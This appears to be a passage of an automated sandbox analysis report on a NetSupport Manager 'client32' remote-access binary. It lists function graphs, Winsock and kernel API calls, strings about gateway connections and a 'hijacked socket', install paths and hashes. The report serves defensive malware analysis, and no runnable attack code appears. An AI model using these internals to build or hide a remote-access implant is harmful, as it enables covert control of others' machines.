                                                                                                                  control_flow_graph 989 6bec7030-6bec7050 call 6beb2a90 call 6becdbd0 994 6bec7097 989->994 995 6bec7052-6bec7095 LoadLibraryA 989->995 996 6bec7099-6bec70f8 call 6beb8d00 InitializeCriticalSection CreateEventA 994->996 995->996 999 6bec70fa-6bec710e call 6beb6f50 996->999 1000 6bec7111-6bec711e CreateEventA 996->1000 999->1000 1002 6bec7137-6bec7144 CreateEventA 1000->1002 1003 6bec7120-6bec7134 call 6beb6f50 1000->1003 1006 6bec715d-6bec7170 WSAStartup 1002->1006 1007 6bec7146-6bec715a call 6beb6f50 1002->1007 1003->1002 1010 6bec7172-6bec7182 call 6beb5290 call 6beb2b70 1006->1010 1011 6bec7183-6bec71b2 call 6bed1b69 1006->1011 1007->1006 1017 6bec71b4-6bec71cd call 6beb6f50 1011->1017 1018 6bec71d0-6bec71e4 call 6bed1c50 1011->1018 1017->1018 1025 6bec71fa-6bec7202 1018->1025 1026 6bec71e6-6bec71e9 1018->1026 1028 6bec7209-6bec7223 call 6bed3753 1025->1028 1029 6bec7204 1025->1029 1026->1025 1027 6bec71eb-6bec71f1 1026->1027 1027->1025 1031 6bec71f3-6bec71f8 1027->1031 1033 6bec723c-6bec7255 call 6bec9bf0 1028->1033 1034 6bec7225-6bec7239 call 6beb6f50 1028->1034 1029->1028 1031->1028 1039 6bec726a-6bec7271 call 6beb5730 1033->1039 1040 6bec7257-6bec725e 1033->1040 1034->1033 1044 6bec730b-6bec7310 1039->1044 1045 6bec7277-6bec729a call 6bed1b69 1039->1045 1041 6bec7260-6bec7268 1040->1041 1041->1039 1041->1041 1046 6bec731e-6bec7336 call 6beb5e90 call 6beb5530 1044->1046 1047 6bec7312-6bec7315 1044->1047 1053 6bec729c-6bec72bb call 6beb6f50 1045->1053 1054 6bec72be-6bec72dc call 6bed1c50 call 6bed1b69 1045->1054 1052 6bec7339-6bec7354 call 6beb5e90 1046->1052 1047->1046 1049 6bec7317-6bec731c 1047->1049 1049->1046 1049->1052 1065 6bec7356-6bec735c 1052->1065 1066 6bec7361-6bec738b GetTickCount CreateThread 1052->1066 1053->1054 1070 6bec72de-6bec72f7 call 6beb6f50 1054->1070 1071 6bec72fa-6bec7308 call 6bed1c50 1054->1071 1065->1066 1068 6bec738d-6bec73a6 call 6beb6f50 1066->1068 1069 6bec73a9-6bec73b6 SetThreadPriority 1066->1069 1068->1069 1073 6bec73cf-6bec73ed call 6beb5f20 call 6beb5e90 1069->1073 1074 6bec73b8-6bec73cc call 6beb6f50 1069->1074 1070->1071 1071->1044 1086 6bec73ef 1073->1086 1087 6bec73f5-6bec73f7 1073->1087 1074->1073 1086->1087 1088 6bec73f9-6bec7407 call 6becdbd0 1087->1088 1089 6bec7425-6bec7447 GetModuleFileNameA call 6beb2420 1087->1089 1096 6bec741e 1088->1096 1097 6bec7409-6bec741c call 6beb4580 1088->1097 1094 6bec744c 1089->1094 1095 6bec7449-6bec744a 1089->1095 1099 6bec7451-6bec746d 1094->1099 1095->1099 1098 6bec7420 1096->1098 1097->1098 1098->1089 1101 6bec7470-6bec747f 1099->1101 1101->1101 1103 6bec7481-6bec7486 1101->1103 1104 6bec7487-6bec748d 1103->1104 1104->1104 1105 6bec748f-6bec74c8 GetPrivateProfileIntA GetModuleHandleA 1104->1105 1106 6bec74ce-6bec74fa call 6beb5e90 * 2 1105->1106 1107 6bec7563-6bec758f CreateMutexA timeBeginPeriod 1105->1107 1112 6bec74fc-6bec7511 call 6beb5e90 1106->1112 1113 6bec7536-6bec755d call 6beb5e90 * 2 1106->1113 1118 6bec752a-6bec7530 1112->1118 1119 6bec7513-6bec7528 call 6beb5e90 1112->1119 1113->1107 1118->1113 1119->1113 1119->1118
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6BEB2ACB
                                                                                                                    • Part of subcall function 6BEB2A90: _strrchr.LIBCMT ref: 6BEB2ADA
                                                                                                                    • Part of subcall function 6BEB2A90: _strrchr.LIBCMT ref: 6BEB2AEA
                                                                                                                    • Part of subcall function 6BEB2A90: wsprintfA.USER32 ref: 6BEB2B05
                                                                                                                    • Part of subcall function 6BECDBD0: _malloc.LIBCMT ref: 6BECDBE9
                                                                                                                    • Part of subcall function 6BECDBD0: wsprintfA.USER32 ref: 6BECDC04
                                                                                                                    • Part of subcall function 6BECDBD0: _memset.LIBCMT ref: 6BECDC27
                                                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6BEC7057
                                                                                                                  • InitializeCriticalSection.KERNEL32(6BEFB898), ref: 6BEC70DF
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC70EF
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC7115
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC713B
                                                                                                                  • WSAStartup.WSOCK32(00000101,6BEFB91A), ref: 6BEC7167
                                                                                                                  • _malloc.LIBCMT ref: 6BEC71A3
                                                                                                                    • Part of subcall function 6BED1B69: __FF_MSGBANNER.LIBCMT ref: 6BED1B82
                                                                                                                    • Part of subcall function 6BED1B69: __NMSG_WRITE.LIBCMT ref: 6BED1B89
                                                                                                                    • Part of subcall function 6BED1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BEDD3C1,6BED6E81,00000001,6BED6E81,?,6BEDF447,00000018,6BEF7738,0000000C,6BEDF4D7), ref: 6BED1BAE
                                                                                                                  • _memset.LIBCMT ref: 6BEC71D3
                                                                                                                  • _calloc.LIBCMT ref: 6BEC7214
                                                                                                                  • _malloc.LIBCMT ref: 6BEC728B
                                                                                                                  • _memset.LIBCMT ref: 6BEC72C1
                                                                                                                  • _malloc.LIBCMT ref: 6BEC72CD
                                                                                                                  • _memset.LIBCMT ref: 6BEC7303
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC7361
                                                                                                                  • CreateThread.KERNEL32(00000000,00004000,6BEC6BA0,00000000,00000000,6BEFBACC), ref: 6BEC737E
                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6BEC73AC
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\netsupport\client\Support\,00000104), ref: 6BEC7430
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\netsupport\client\Support\pci.ini), ref: 6BEC74B0
                                                                                                                  • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6BEC74C0
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6BEC7566
                                                                                                                  • timeBeginPeriod.WINMM(00000001), ref: 6BEC7573
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                  • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/v$494126$C:\ProgramData\netsupport\client\Support\$C:\ProgramData\netsupport\client\Support\pci.ini$General$HTCTL32$NSM301071$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                  • API String ID: 3160247386-1731328905
                                                                                                                  • Opcode ID: 5e195d4eaf3ee6b34b1f85abd852f893f964bec2aa99e4aba348eb0690c33ead
                                                                                                                  • Instruction ID: 5dc7c4bbd0ee9da0706cb22419ea34e3a6b2a00002eaa64c4d1ee45ab90922f9
                                                                                                                  • Opcode Fuzzy Hash: 5e195d4eaf3ee6b34b1f85abd852f893f964bec2aa99e4aba348eb0690c33ead
                                                                                                                  • Instruction Fuzzy Hash: 32D1D3B0E00354AFDB109F78AD81A177BECFB99348B704469F919D7341E739E8518BA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 110612D0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 11141240: GetLastError.KERNEL32(?,00000000,754D795C,00000000), ref: 11141275
                                                                                                                    • Part of subcall function 11141240: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,754D795C,00000000), ref: 11141285
                                                                                                                  • _fgets.LIBCMT ref: 11061402
                                                                                                                  • _strpbrk.LIBCMT ref: 11061469
                                                                                                                  • _fgets.LIBCMT ref: 1106156C
                                                                                                                  • _strpbrk.LIBCMT ref: 110615E3
                                                                                                                  • __wcstoui64.LIBCMT ref: 110615FC
                                                                                                                  • _fgets.LIBCMT ref: 11061675
                                                                                                                  • _strpbrk.LIBCMT ref: 1106169B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                  • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                  • API String ID: 716802716-1571441106
                                                                                                                  • Opcode ID: 889064ab9b8cb21b4403e3511827bdee5e14e439b663983c64d8c18715834237
                                                                                                                  • Instruction ID: 7d354751decb521dd2b5a9477f267ff04dc70e6f2396a8d0e1f3593140cd268d
                                                                                                                  • Opcode Fuzzy Hash: 889064ab9b8cb21b4403e3511827bdee5e14e439b663983c64d8c18715834237
                                                                                                                  • Instruction Fuzzy Hash: D6A2C275E0465A9FEB10CF64CC40BEFB7B9AF44309F0481D9E949A7280EB71AA45CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEBA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1932 6beba980-6beba9e7 call 6beb5840 1935 6beba9ed-6beba9f0 1932->1935 1936 6bebaa9c 1932->1936 1935->1936 1937 6beba9f6-6beba9fb 1935->1937 1938 6bebaaa2-6bebaaae 1936->1938 1937->1936 1939 6bebaa01-6bebaa06 1937->1939 1940 6bebaab0-6bebaac5 call 6bed28e1 1938->1940 1941 6bebaac6-6bebaacd 1938->1941 1939->1936 1943 6bebaa0c-6bebaa21 EnterCriticalSection 1939->1943 1944 6bebab48-6bebab58 socket 1941->1944 1945 6bebaacf-6bebaad7 1941->1945 1947 6bebaa89-6bebaa9a LeaveCriticalSection 1943->1947 1948 6bebaa23-6bebaa2b 1943->1948 1950 6bebab5a-6bebab6f WSAGetLastError call 6bed28e1 1944->1950 1951 6bebab70-6bebabc9 #21 * 2 call 6beb5e90 1944->1951 1945->1944 1949 6bebaad9-6bebaadc 1945->1949 1947->1938 1954 6bebaa30-6bebaa39 1948->1954 1949->1944 1955 6bebaade-6bebab05 call 6beba5c0 1949->1955 1961 6bebabcb-6bebabe3 #21 1951->1961 1962 6bebabe8-6bebac1f bind 1951->1962 1958 6bebaa3b-6bebaa3f 1954->1958 1959 6bebaa49-6bebaa51 1954->1959 1969 6bebab0b-6bebab2f WSAGetLastError call 6beb30a0 1955->1969 1970 6bebad4a-6bebad69 EnterCriticalSection 1955->1970 1958->1959 1963 6bebaa41-6bebaa47 1958->1963 1959->1954 1965 6bebaa53-6bebaa5e LeaveCriticalSection 1959->1965 1961->1962 1966 6bebac41-6bebac49 1962->1966 1967 6bebac21-6bebac40 WSAGetLastError closesocket call 6bed28e1 1962->1967 1963->1959 1968 6bebaa60-6bebaa88 LeaveCriticalSection call 6bed28e1 1963->1968 1965->1938 1976 6bebac4b-6bebac57 1966->1976 1977 6bebac59-6bebac64 1966->1977 1983 6bebae82-6bebae92 call 6bed28e1 1969->1983 1986 6bebab35-6bebab47 call 6bed28e1 1969->1986 1971 6bebad6f-6bebad7d 1970->1971 1972 6bebae50-6bebae80 LeaveCriticalSection GetTickCount InterlockedExchange 1970->1972 1978 6bebad80-6bebad86 1971->1978 1972->1983 1982 6bebac65-6bebac83 htons WSASetBlockingHook call 6beb7610 1976->1982 1977->1982 1984 6bebad88-6bebad90 1978->1984 1985 6bebad97-6bebae0f InitializeCriticalSection call 6beb8fb0 call 6bed0ef0 1978->1985 1993 6bebac88-6bebac8d 1982->1993 1984->1978 1990 6bebad92 1984->1990 2007 6bebae18-6bebae4b getsockname 1985->2007 2008 6bebae11 1985->2008 1990->1972 1994 6bebac8f-6bebacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6beb30a0 call 6bed28e1 1993->1994 1995 6bebacc6-6bebaccd 1993->1995 1999 6bebaccf-6bebacd6 1995->1999 2000 6bebad45 WSAUnhookBlockingHook 1995->2000 1999->2000 2003 6bebacd8-6bebacfb call 6beba5c0 1999->2003 2000->1970 2003->2000 2011 6bebacfd-6bebad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6beb30a0 2003->2011 2007->1972 2008->2007 2011->1983 2014 6bebad32-6bebad44 call 6bed28e1 2011->2014
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,?,00000000,00000000), ref: 6BEBAA11
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA58
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA68
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA94
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6BEBAB0B
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB4E
                                                                                                                  • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB5A
                                                                                                                  • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB8E
                                                                                                                  • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBABB1
                                                                                                                  • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBABE3
                                                                                                                  • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC18
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC21
                                                                                                                  • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC29
                                                                                                                  • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC65
                                                                                                                  • WSASetBlockingHook.WSOCK32(6BEB63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC76
                                                                                                                  • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC8F
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC96
                                                                                                                  • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC9C
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBACFD
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD04
                                                                                                                  • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD0A
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD45
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD4F
                                                                                                                  • InitializeCriticalSection.KERNEL32(-6BEFCB4A), ref: 6BEBADE6
                                                                                                                    • Part of subcall function 6BEB8FB0: _memset.LIBCMT ref: 6BEB8FE4
                                                                                                                    • Part of subcall function 6BEB8FB0: getsockname.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB9005
                                                                                                                  • getsockname.WSOCK32(00000000,?,?), ref: 6BEBAE4B
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAE60
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEBAE6C
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBAE7A
                                                                                                                  Strings
                                                                                                                  • Connect error to %s using hijacked socket, error %d, xrefs: 6BEBAB17
                                                                                                                  • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6BEBAD14
                                                                                                                  • Cannot connect to gateway %s, error %d, xrefs: 6BEBACA6
                                                                                                                  • *TcpNoDelay, xrefs: 6BEBABB8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                  • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                  • API String ID: 692187944-2561115898
                                                                                                                  • Opcode ID: 52e4dadcc28fc42ccd8705328bcc1347bd217c77094907ed8254e96bd5a311b4
                                                                                                                  • Instruction ID: 1a3f2d5908de9476f57d471e74c2d30b1398e5429e8c329f9a25854c2a0dc98f
                                                                                                                  • Opcode Fuzzy Hash: 52e4dadcc28fc42ccd8705328bcc1347bd217c77094907ed8254e96bd5a311b4
                                                                                                                  • Instruction Fuzzy Hash: 68E1B575A402189FDF10DFA4DD81B9DB3B5EF88305F2041AEE90A97380DB789D95CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB91F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • #16.WSOCK32(00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB924C
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB925B
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB9274
                                                                                                                  • Sleep.KERNEL32(00000001,00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB92A8
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB92B0
                                                                                                                  • Sleep.KERNEL32(00000014), ref: 6BEB92BC
                                                                                                                  Strings
                                                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6BEB9226
                                                                                                                  • ReadSocket - Connection has been closed by peer, xrefs: 6BEB92E0
                                                                                                                  • a3k, xrefs: 6BEB9244
                                                                                                                  • ReadSocket - Would block, xrefs: 6BEB928A
                                                                                                                  • *RecvTimeout, xrefs: 6BEB927B
                                                                                                                  • ReadSocket - Error %d reading response, xrefs: 6BEB92F7
                                                                                                                  • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6BEB922B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountSleepTick$ErrorLast
                                                                                                                  • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3k$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                  • API String ID: 2495545493-3875726919
                                                                                                                  • Opcode ID: e8a5a9fcd373c5ccd2f26a40a74ff2d5a5f5bd07018f8b6f7451a62d74c491d3
                                                                                                                  • Instruction ID: ddd2a4ae8d054d26e674def8952b18933656cfb2983143f234349092b5df8d31
                                                                                                                  • Opcode Fuzzy Hash: e8a5a9fcd373c5ccd2f26a40a74ff2d5a5f5bd07018f8b6f7451a62d74c491d3
                                                                                                                  • Instruction Fuzzy Hash: 70312779E00208AFEB10DFF8EA85B8E73F8EF55315F204469F909D7241D73999118791
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,9410354D,4CBAF0D2,941034B3,FFFFFFFF,00000000), ref: 6BEC31E2
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6BEEECB0), ref: 6BEC31EC
                                                                                                                  • GetSystemTime.KERNEL32(?,4CBAF0D2,941034B3,FFFFFFFF,00000000), ref: 6BEC322A
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6BEEECB0), ref: 6BEC3234
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,?,9410354D), ref: 6BEC32BE
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6BEC32D3
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6BEC334D
                                                                                                                    • Part of subcall function 6BECBA20: __strdup.LIBCMT ref: 6BECBA3A
                                                                                                                    • Part of subcall function 6BECBB00: _free.LIBCMT ref: 6BECBB2D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                  • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                  • API String ID: 1510130979-3441452530
                                                                                                                  • Opcode ID: 7a8ee056370b8da5b7a45ca4697db19b28c3b0562e9e96feca3bbb744a539853
                                                                                                                  • Instruction ID: b5e2fe7f568e7f7599dc4a0e12490221a7cbba93a8cc1bf48fa654e9dfbfb671
                                                                                                                  • Opcode Fuzzy Hash: 7a8ee056370b8da5b7a45ca4697db19b28c3b0562e9e96feca3bbb744a539853
                                                                                                                  • Instruction Fuzzy Hash: B5612F72D00208AFCB14DFB4D995EEEB7B9FF49314F24451DE526A7241EB38A504CBA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 1102D560 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
